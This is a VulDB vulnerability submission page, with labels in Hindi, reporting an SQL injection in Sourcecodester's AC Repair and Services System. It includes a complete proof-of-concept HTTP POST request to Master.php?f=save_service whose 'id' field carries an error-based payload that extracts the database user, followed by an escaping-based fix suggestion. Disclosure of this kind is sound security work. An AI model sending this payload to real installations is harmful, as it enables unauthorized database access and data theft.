जमा करें #180767: Sourcecodester Ac Repair And Services System HTTP POST Request sql injectionजानकारी

शीर्षकSourcecodester Ac Repair And Services System HTTP POST Request sql injection
विवरणI find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=save_service. POST /php-acrss/classes/Master.php?f=save_service HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------263926565035055952363112430264 Content-Length: 845 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=services/manage_service Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="id" 1 or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="name" 111 -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="price" 111 -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="description" <p>1111</p> -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="image"; filename="" Content-Type: image/png -----------------------------263926565035055952363112430264 Content-Disposition: form-data; name="status" 1 -----------------------------263926565035055952363112430264-- My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
स्रोत⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
उपयोगकर्ता
 fushuling (UID 45488)
सबमिशन11/07/2023 03:05 PM (3 साल पहले)
संयम11/07/2023 04:50 PM (2 hours later)
स्थितिस्वीकृत
VulDB प्रविष्टि233573 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=save_service पहचान SQL इंजेक्शन]
अंक20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!